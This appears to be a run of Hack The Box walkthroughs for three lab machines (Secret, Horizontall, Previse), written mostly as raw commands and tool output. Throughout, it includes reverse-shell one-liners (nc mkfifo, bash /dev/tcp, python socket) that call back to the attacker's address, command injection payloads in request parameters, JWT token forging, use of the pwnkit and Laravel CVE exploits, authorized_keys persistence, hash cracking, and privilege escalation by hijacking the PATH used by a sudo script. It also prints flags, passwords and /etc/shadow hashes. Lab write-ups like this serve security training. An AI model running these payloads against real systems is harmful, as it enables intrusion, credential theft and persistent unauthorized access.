First of course I ran nmap -sC -sV 10.10.11.120, and checked out the websites with some enumperation, but I found this api running on port 3000 to play with:

lanix@lgrover-lap-01:~/HTB/Secret$ curl -X POST http://10.10.11.120:3000/api/user/register -H ‘Content-Type: application/json’ -d ‘{“email”:”root@dasiths.works”,”name”:”tester”,”password”:”Kekc8swFgD6zU”}’
{“user”:”tester”}lanix@lgrover-lap-01:~/HTB/Secret$

now we login:

lanix@lgrover-lap-01:~/HTB/Secret$ curl -X POST http://10.10.11.120:3000/api/user/login -H ‘Content-Type: application/json’ -d ‘{“email”:”root@dasiths.works”,”password”:”Kekc8swFgD6zU”}’
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGVzdGVyIiwiZW1haWwiOiJyb290QGRhc2l0aHMud29ya3MiLCJpYXQiOjE2NDM1MjM1MjR9.4_s-m8WD4yR9J8TID2Ydvd4C9Lj1xMGx34R_RAgl6wclanix@lgrover-lap-01:~/HTB/Secret$

now we take that and use https://github.com/ticarpi/jwt_tool

lanix@lgrover-lap-01:~/HTB/Secret$ python3 jwt_tool/jwt_tool.py -I -S hs256 -pc 'name' -pv 'theadmin' -p 'gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE' eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGVzdGVyIiwiZW1haWwiOiJyb290QGRhc2l0aHMud29ya3MiLCJpYXQiOjE2NDM1MjM1MjR9.4_s-m8WD4yR9J8TID2Ydvd4C9Lj1xMGx34R_RAgl6wc

        \   \        \         \          \                    \ 
   \__   |   |  \     |\__    __| \__    __|                    |
         |   |   \    |      |          |       \         \     |
         |        \   |      |          |    __  \     __  \    |
  \      |      _     |      |          |   |     |   |     |   |
   |     |     / \    |      |          |   |     |   |     |   |
\        |    /   \   |      |          |\        |\        |   |
 \______/ \__/     \__|   \__|      \__| \______/  \______/ \__|
 Version 2.2.4                \______|             @ticarpi      

Original JWT: 

jwttool_f1454aca7ebd3cf03d089a425ba09757 - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRocy53b3JrcyIsImlhdCI6MTY0MzUyMzUyNH0.PFHh-JBylEMpQScIUepfDr-81SLrtNBjY6A_z3vdYEg

then we start up our netcat listener

nc -lpnv 1337

Now we exploit to get shell using the token from above

lanix@lgrover-lap-01:~/HTB/Secret$ curl 'http://10.10.11.120:3000/api/logs?file=;rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+10.10.14.58+1337+%3E%2Ftmp%2Ff%0A%0A' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2MmQ5OWNlOGYyMjA0NWNjYzE5MzgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRocy53b3JrcyIsImlhdCI6MTY0MzUyMzUyNH0.PFHh-JBylEMpQScIUepfDr-81SLrtNBjY6A_z3vdYEg'

now create ourselves an entry in the authorized_keys file (first make sure the ~/.ssh directory exists)

$ echo "ssh-rsa AAAAB3NzaC1yc2EA**************************************************************A0XQ4GZT la@htb" >> authorized_keys

now we can get the user.txt

cat user.txt
cf3762b8cfd19834ad6543a16c297227

then I looked for suid exes, found /opt/count

using /opt/count I had it look at /root/.ssh/id_rsa then in another shell I killed the process
I went to /var/crash and used apport-unpack _path_exe..crash /tmp/somedir then used strings on the CoreDump to see the contents of the id_rsa file, then I could ssh directly in as root…I also used that technique to get the /root/root.txt file but wanted to get shell as well.

Now lets use pwnkit to get root!

I created a .pwnkit directory and pulled down my files from my box, on my local box I did:

git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
python3 -m http.server 8080

Then on the Secret.htb box I pulled down 3 files:

wget http://10.10.14.58:8080/Makefile
wget http://10.10.14.58:8080/cve-2021-4034.c
wget http://10.10.14.58:8080/pwnkit.c
make
./cve-2021-4034

Now I had a root shell!

dasith@secret:~/.pwnkit$ ./cve-2021-4034 
# id
uid=0(root) gid=0(root) groups=0(root),1000(dasith)
#

cat /root/root.txt
764cfded32d3eca063281c06174ba4ec

Further proof:

cat /etc/shadow

root:$6$/0f5J.S8.u.dA78h$xSyDRhh5Zf18Ha9XNVo5dvPhxnI0i7D/uD8T5FcYgN1FYMQbvkZakMgjgm3bhtS6hgKWBcD/QJqPgQR6cycFj.:18873:0:99999:7:::

nmap -sV -sC 10.10.11.105
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-07 22:46 MST
Nmap scan report for 10.10.11.105
Host is up (0.086s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.03 seconds

add dns to /etc/hosts

echo "10.10.11.105 horizontall.htb" >> /etc/hosts

Lets see what we have

$ curl -v http://horizontall.htb
*   Trying 10.10.11.105:80...
* Connected to horizontall.htb (10.10.11.105) port 80 (#0)
> GET / HTTP/1.1
> Host: horizontall.htb
> User-Agent: curl/7.79.1
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Sat, 08 Jan 2022 05:53:48 GMT
< Content-Type: text/html
< Content-Length: 901
< Last-Modified: Fri, 30 Jul 2021 07:25:57 GMT
< Connection: keep-alive
< ETag: "6103a985-385"
< Accept-Ranges: bytes
< 
<!DOCTYPE html><html lang=""><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" href="/favicon.ico"><title>horizontall</title><link href="/css/app.0f40a091.css" rel="preload" as="style"><link href="/css/chunk-vendors.55204a1e.css" rel="preload" as="style"><link href="/js/app.c68eb462.js" rel="preload" as="script"><link href="/js/chunk-vendors.0e02b89e.js" rel="preload" as="script"><link href="/css/chunk-vendors.55204a1e.css" rel="stylesheet"><link href="/css/app.0f40a091.css" rel="stylesheet"></head><body><noscript><strong>We're sorry but horizontall doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app"></div><script src="/js/chunk-vendors.0e02b89e.js"></script><script src="/js/app.c68eb462.js"></script></body></html>
* Connection #0 to host horizontall.htb left intact

ok, running nginx, but lets see what files

$ ffuf -u http://horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://horizontall.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.html              [Status: 200, Size: 901, Words: 43, Lines: 2]
favicon.ico             [Status: 200, Size: 4286, Words: 8, Lines: 1]
.                       [Status: 301, Size: 194, Words: 7, Lines: 8]
:: Progress: [37050/37050] :: Job [1/1] :: 462 req/sec :: Duration: [0:01:20] :: Errors: 1 ::

not much there…lets try hosts:

$ curl -s -H "Host: doesntexist.horizontall.htb" http://horizontall.htb | wc -c
194
$ ffuf -c -u http://horizontall.htb/ -H "Host: FUZZ.horizontall.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 194

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://horizontall.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.horizontall.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 194
________________________________________________

www                     [Status: 200, Size: 901, Words: 43, Lines: 2]
api-prod                [Status: 200, Size: 413, Words: 76, Lines: 20]
:: Progress: [114441/114441] :: Job [1/1] :: 465 req/sec :: Duration: [0:04:08] :: Errors: 0 ::

Ah, api-prod.horizontall.htb lets check this one out, add it to /etc/hosts

$ sed "s/horizontall.htb/horizontall.htb api-prod.horizontall.htb/g" -i /etc/hosts

now lets see….

curl -v http://api-prod.horizontall.htb
*   Trying 10.10.11.105:80...
* Connected to api-prod.horizontall.htb (10.10.11.105) port 80 (#0)
> GET / HTTP/1.1
> Host: api-prod.horizontall.htb
> User-Agent: curl/7.79.1
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Sat, 08 Jan 2022 06:17:49 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 413
< Connection: keep-alive
< Vary: Origin
< Content-Security-Policy: img-src 'self' http:; block-all-mixed-content
< Strict-Transport-Security: max-age=31536000; includeSubDomains
< X-Frame-Options: SAMEORIGIN
< X-XSS-Protection: 1; mode=block
< Last-Modified: Wed, 02 Jun 2021 20:00:29 GMT
< Cache-Control: max-age=60
< X-Powered-By: Strapi <strapi.io>
< 
<!doctype html>

<html>
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <title>Welcome to your API</title>
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style>
    </style>
  </head>
  <body lang="en">
    <section>
      <div class="wrapper">
        <h1>Welcome.</h1>
      </div>
    </section>
  </body>
</html>
* Connection #0 to host api-prod.horizontall.htb left intact

and now the ffuf

$ ffuf -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://api-prod.horizontall.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

#                       [Status: 200, Size: 413, Words: 76, Lines: 20]
                        [Status: 200, Size: 413, Words: 76, Lines: 20]
#                       [Status: 200, Size: 413, Words: 76, Lines: 20]
# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 413, Words: 76, Lines: 20]
# This work is licensed under the Creative Commons [Status: 200, Size: 413, Words: 76, Lines: 20]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 413, Words: 76, Lines: 20]
# on at least 1 host    [Status: 200, Size: 413, Words: 76, Lines: 20]
#                       [Status: 200, Size: 413, Words: 76, Lines: 20]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 413, Words: 76, Lines: 20]
# Copyright 2007 James Fisher [Status: 200, Size: 413, Words: 76, Lines: 20]
#                       [Status: 200, Size: 413, Words: 76, Lines: 20]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 413, Words: 76, Lines: 20]
# directory-list-2.3-big.txt [Status: 200, Size: 413, Words: 76, Lines: 20]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 413, Words: 76, Lines: 20]
reviews                 [Status: 200, Size: 507, Words: 21, Lines: 1]
users                   [Status: 403, Size: 60, Words: 1, Lines: 1]
admin                   [Status: 200, Size: 854, Words: 98, Lines: 17]
Reviews                 [Status: 200, Size: 507, Words: 21, Lines: 1]
Users                   [Status: 403, Size: 60, Words: 1, Lines: 1]
Admin                   [Status: 200, Size: 854, Words: 98, Lines: 17]
REVIEWS                 [Status: 200, Size: 507, Words: 21, Lines: 1]
                        [Status: 200, Size: 413, Words: 76, Lines: 20]

look at some of them

curl http://api-prod.horizontall.htb/reviews/
[{"id":1,"name":"wail","description":"This is good service","stars":4,"created_at":"2021-05-29T13:23:38.000Z","updated_at":"2021-05-29T13:23:38.000Z"},{"id":2,"name":"doe","description":"i'm satisfied with the product","stars":5,"created_at":"2021-05-29T13:24:17.000Z","updated_at":"2021-05-29T13:24:17.000Z"},{"id":3,"name":"john","description":"create service with minimum price i hop i can buy more in the futur","stars":5,"created_at":"2021-05-29T13:25:26.000Z","updated_at":"2021-05-29T13:25:26.000Z"}]

curl http://api-prod.horizontall.htb/admin/
<!doctype html>
<html lang="en">
<head>
  <!-- The first thing in any HTML file should be the charset -->
  <meta charset="utf-8">
  <!-- Make the page mobile compatible -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="mobile-web-app-capable" content="yes">
  <title>Strapi Admin</title>
</head>
<body>
<!-- The app hooks into this div -->
<div id="app"></div>
<!-- A lot of magic happens in this file. HtmlWebpackPlugin automatically includes all assets (e.g. bundle.js, main.css) with the correct HTML tags, which is why they are missing in this HTML file. Don't add any assets here! (Check out webpackconfig.js if you want to know more) -->
<script type="text/javascript" src="/admin/runtime~main.d078dc17.js"></script><script type="text/javascript" src="/admin/main.da91597e.chunk.js"></script></body>
</html>

curl http://api-prod.horizontall.htb/users/
{"statusCode":403,"error":"Forbidden","message":"Forbidden"}

poking around, I end up seeing the http://api-prod.horizontall.htb/admin/auth/login and it shows a logo for “strapi”

so…that gives us an idea to look for!

https://www.cvedetails.com/cve/CVE-2019-18818/

now we need to be able to exploit this….exploit-db!

https://www.exploit-db.com/exploits/50239

blind exploit! time for a reverse shell…..

nc -lvnp 2345

bash -c 'bash -i >& /dev/tcp/10.10.14.10/2345 0>&1'

Now we have shell

cd /home
ls
cd developer
cat user.txt

now lets get a direct ssh connection

echo "ssh-rsa  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA kali" >> ~/.ssh/authorized_keys

Now I can direct ssh in with:

ssh -i id_rsa-horizontall strapi@horizontall.htb

now lets see whats going on

$ netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1809/node /usr/bin/ 
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
$

We see port 8000 as available

$ curl http://localhost:8000
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <title>Laravel</title>

        <!-- Fonts -->
        <link href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;600;700&display=swap" rel="stylesheet">

        <!-- Styles -->
        <style>
.....................................
                                <svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="w-8 h-8 text-gray-500"><path d="M12 6.253v13m0-13C10.832 5.477 9.246 5 7.5 5S4.168 5.477 3 6.253v13C4.168 18.477 5.754 18 7.5 18s3.332.477 4.5 1.253m0-13C13.168 5.477 14.754 5 16.5 5c1.747 0 3.332.477 4.5 1.253v13C19.832 18.477 18.247 18 16.5 18c-1.746 0-3.332.477-4.5 1.253"></path></svg>
                                <div class="ml-4 text-lg leading-7 font-semibold"><a href="https://laravel.com/docs" class="underline text-gray-900 dark:text-white">Documentation</a></div>
                            </div>
.....................................

well well well…Laravel

https://github.com/nth347/CVE-2021-3129_exploit

so we download the exploit.py to local machine and setup a web server to pull the file and get it to the host

git clone https://github.com/nth347/CVE-2021-3129_exploit.git
cd CVE-2021-3129_exploit/
python3 -m http.server 8080

Now we can pull the file to the horizontall box

$ wget http://10.10.14.8:8080/exploit.py
--2022-01-12 05:21:17--  http://10.10.14.8:8080/exploit.py
Connecting to 10.10.14.8:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2935 (2.9K) [text/x-python]
Saving to: ‘exploit.py’

exploit.py                                        100%[=============================================================================================================>]   2.87K  --.-KB/s    in 0s      

2022-01-12 05:21:17 (118 MB/s) - ‘exploit.py’ saved [2935/2935]

$

and it doesn’t work as is:

$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
[i] Trying to clear logs
[+] Logs cleared
[i] PHPGGC not found. Cloning it
Cloning into 'phpggc'...
fatal: unable to access 'https://github.com/ambionics/phpggc.git/': Could not resolve host: github.com
[-] Fail to convert logs to PHAR
[i] There is no output
[i] Trying to clear logs
[+] Logs cleared
$ 

so…we need phpggc

git clone https://github.com/ambionics/phpggc.git/
tar cvf phpggc.tar phpggc
python3 -m http.server 8080

and now lets pull down phpggc.tar

tar xvf phpggc.tar

Now, we have the money

$ python3 exploit.py http://localhost:8000 Monolog/RCE1 "cat /root/root.txt"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

19b0fab7850cf2a45284cf4221411e11

[i] Trying to clear logs
[+] Logs cleared

Do you want an option2, this is another way to do it without needing to copy the exploit files to the horizontall box…..First get the files on your box, you should have a phpggc directory and the exploit.py in your current folder then in one tab do:

ssh -i id_rsa-horizontall -L 8000:localhost:8000 strapi@horizontall.htb

Now in another tab you can execute this:

$ python3 exploit.py http://localhost:8000 Monolog/RCE1 "cat /root/root.txt"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

19b0fab7850cf2a45284cf4221411e11

[i] Trying to clear logs
[+] Logs cleared

and now…we still don’t have shell…so why not get root shell

$ python3 exploit.py http://localhost:8000 Monolog/RCE1 "cp /opt/strapi/.ssh/authorized_keys  /root/.ssh/authorized_keys"

now ssh in as root using the same ssh key

ssh -i id_rsa-horizontall root@horizontall.htb

BOOM

further proof:

root@horizontall:~# cat /etc/shadow
root:$6$rGxQBZV9$SbzCXDzp1MEx7xxXYuV5voXCy4k9OdyCDbyJcWuETBujfMrpfVtTXjbx82bTNlPK6Ayg8SqKMYgVlYukVOKJz1:18836:0:99999:7:::

nmap -sV -sC 10.10.11.104

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-06 22:15 MST
Nmap scan report for 10.10.11.104
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.01 seconds


echo "10.10.11.104 previse.htb" >> /etc/hosts


ffuf -u http://previse.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://previse.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.php               [Status: 302, Size: 2801, Words: 737, Lines: 72]
login.php               [Status: 200, Size: 2224, Words: 486, Lines: 54]
download.php            [Status: 302, Size: 0, Words: 1, Lines: 1]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
footer.php              [Status: 200, Size: 217, Words: 10, Lines: 6]
header.php              [Status: 200, Size: 980, Words: 183, Lines: 21]
favicon.ico             [Status: 200, Size: 15406, Words: 15, Lines: 10]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1]
.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.                       [Status: 302, Size: 2801, Words: 737, Lines: 72]
.html                   [Status: 403, Size: 276, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 276, Words: 20, Lines: 10]
status.php              [Status: 302, Size: 2968, Words: 749, Lines: 75]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htm                    [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswds              [Status: 403, Size: 276, Words: 20, Lines: 10]
nav.php                 [Status: 200, Size: 1248, Words: 462, Lines: 32]
accounts.php            [Status: 302, Size: 3994, Words: 1096, Lines: 94]
files.php               [Status: 302, Size: 4914, Words: 1531, Lines: 113]
.htgroup                [Status: 403, Size: 276, Words: 20, Lines: 10]
wp-forum.phps           [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.bak           [Status: 403, Size: 276, Words: 20, Lines: 10]
.htuser                 [Status: 403, Size: 276, Words: 20, Lines: 10]
.ht                     [Status: 403, Size: 276, Words: 20, Lines: 10]
.htc                    [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.old           [Status: 403, Size: 276, Words: 20, Lines: 10]
.htacess                [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [37050/37050] :: Job [1/1] :: 449 req/sec :: Duration: [0:01:20] :: Errors: 1 ::





curl -v -d "username=lanix13&password=mypass&confirm=mypass" http://previse.htb/accounts.php

was able to login and go to the Files tab, there is a siteBackup.zip available for download

mkdir siteBackup
cd siteBackup/
unzip ../siteBackup
Archive:  ../siteBackup.zip
  inflating: accounts.php            
  inflating: config.php              
  inflating: download.php            
  inflating: file_logs.php           
  inflating: files.php               
  inflating: footer.php              
  inflating: header.php              
  inflating: index.php               
  inflating: login.php               
  inflating: logout.php              
  inflating: logs.php                
  inflating: nav.php                 
  inflating: status.php

in the file_logs.php there is something fun

logs.php:$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");

curl -v -d "username=lanix133&password=mypass" http://previse.htb/login.php

nc -lnvp 1234

curl -v -b "PHPSESSID=2qvup9fgetiqljd36jieg3gbhl" -d "delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.10/1234+0>%261'" http://previse.htb/logs.php

I have a basic shell, I wanted to upgrade, usually I can with this but it didn’t work in this case

python -c 'import pty:pty.spawn("/bin/bash")'

So I went ahead and just spawned a new reverse shell using python

nc -lvnp 6666
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

now in this new shell I could run mysql a little better

c -lnvp 6666
listening on [any] 6666 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 51970
bash: cannot set terminal process group (1400): Inappropriate ioctl for device
bash: no job control in this shell
www-data@previse:/var/www/html$ screen -list
screen -list
No Sockets found in /run/screen/S-www-data.

www-data@previse:/var/www/html$ mysql -u root -p < "show databases"    
mysql -u root -p < "show databases"
bash: show databases: No such file or directory
www-data@previse:/var/www/html$ mysql -u root -p -e "show databases"
mysql -u root -p -e "show databases"
Enter password: mySQL_p@ssw0rd!:)
Database
information_schema
mysql
performance_schema
previse
sys
www-data@previse:/var/www/html$ mysql -u root -p previse -e "show tables;"
mysql -u root -p previse -e "show tables;"
Enter password: mySQL_p@ssw0rd!:)
Tables_in_previse
accounts
files
www-data@previse:/var/www/html$ mysql -u root -p previse -e "select * from accounts;"
<sql -u root -p previse -e "select * from accounts;"
Enter password: mySQL_p@ssw0rd!:)
id	username	password	created_at
1	m4lwhere	$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.	2021-05-27 18:18:36
2	loda123	$1$🧂llol$Nbgpw9CZswqpbpOCvtzzW1	2022-01-07 05:13:23
3	vector	$1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1	2022-01-07 05:13:24
4	lanix13	$1$🧂llol$eTC00smlkY12Xcfpgowpq1	2022-01-07 05:29:49
5	bigbose	$1$🧂llol$eBQMPwAvz9j9ZpK62qDI//	2022-01-07 05:32:21
6	adrian	$1$🧂llol$eBQMPwAvz9j9ZpK62qDI//	2022-01-07 05:48:10
7	lanix133	$1$🧂llol$eTC00smlkY12Xcfpgowpq1	2022-01-07 05:59:04
www-data@previse:/var/www/html$

took the hash for m4lwhere and used hashcat to crack it:

hashcat -m 500 previse.hash /usr/share/wordlists/rockyou.txt

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

I took that password and m4lwhere and attempted ssh, it worked!

$ ssh m4lwhere@previse.htb
The authenticity of host 'previse.htb (10.10.11.104)' can't be established.
ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'previse.htb' (ED25519) to the list of known hosts.
m4lwhere@previse.htb's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jan  7 06:22:56 UTC 2022

  System load:  0.07              Processes:           184
  Usage of /:   50.5% of 4.85GB   Users logged in:     0
  Memory usage: 25%               IP address for eth0: 10.10.11.104
  Swap usage:   0%


0 updates can be applied immediately.


Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$
m4lwhere@previse:~$ cat user.txt 
ae1**************************


m4lwhere@previse:~$ sudo -l
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh

m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh 
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz


cd /var/shm
echo "nc 10.10.14.10 5555 -e /bin/bash" > gzip

nc -lvnp 5555

export PATH=/dev/shm:$PATH
sudo /opt/scripts/access_backup.sh

listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 59622
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt	
cat root.txt
6e2c7***************

and final proof:

cat /etc/shadow
